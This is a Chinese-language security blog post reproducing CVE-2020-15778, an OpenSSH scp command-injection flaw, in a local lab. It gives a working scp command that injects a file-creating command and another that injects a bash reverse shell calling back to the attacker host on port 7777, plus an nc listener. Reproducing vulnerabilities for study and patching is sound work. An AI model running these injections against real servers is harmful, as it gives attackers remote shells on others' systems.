查看openssh版本_OpenSSH 命令注入漏洞(CVE202015778)复现

b642bf435b8d68b69c59b002509aee15.gif

漏洞详情

漏洞说明#

OpenSSH 8.3p1及之前版本中的scp的scp.c文件存在操作系统命令注入漏洞。该漏洞源于外部输入数据构造操作系统可执行命令过程中,网络系统或产品未正确过滤其中的特殊字符、命令等。攻击者可利用该漏洞执行非法操作系统命令。

漏洞编号#

CVE-2020-15778

影响范围#

OpenSSH <= 8.3p1 

危害等级#

高危

利用条件#

知道目标的ssh密码

修复建议#

先确保ssh密码没有泄露,等一波openssh的新版本吧

实验环境

攻击机:kali 2020.2 192.168.247.130

靶机:CentOS 7       192.168.247.129

aa37031f981fe95f2d3a142d205b6993.png

复现步骤

查看ssh版本

8d41616f7e2fde4a322d6e8907d4c714.png

首先尝试一下利用scp命令,用kali对centOS进行写文件,复制文件

scp 1.txt root@192.168.247.129:'`touch /tmp/test.txt` /tmp'

1f8590a17f7b16d1f5bf59d340d0d9cd.png

直接进行nc反弹获取shell

nc -lvvp 7777

进行反弹shell

scp test.txt root@192.168.247.129:'`bash -i >& /dev/tcp/192.168.247.130/7777 0>&1`/tmp/test1.txt'

53581ed6e7f54be8dbcddfd2c449b6f8.png

查看反弹的shell

f6c46d90b647f303b11aeb4d756e15a3.png

总结:需要知道ssh密码,主要针对知道ssh密码却不给登录,但是允许使用scp传文件这样就可进行反弹shell获取权限了。

aa37031f981fe95f2d3a142d205b6993.png

c91619c537355ce0c284431caccea9b8.gif 89da7c6040099cf1cef7fdf4a6e90c37.png

Hi  这里是白泽Sec~

如果你想了解更多公众号的信息,

欢迎关注我哦~

既然在看了,就点一下吧!!

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值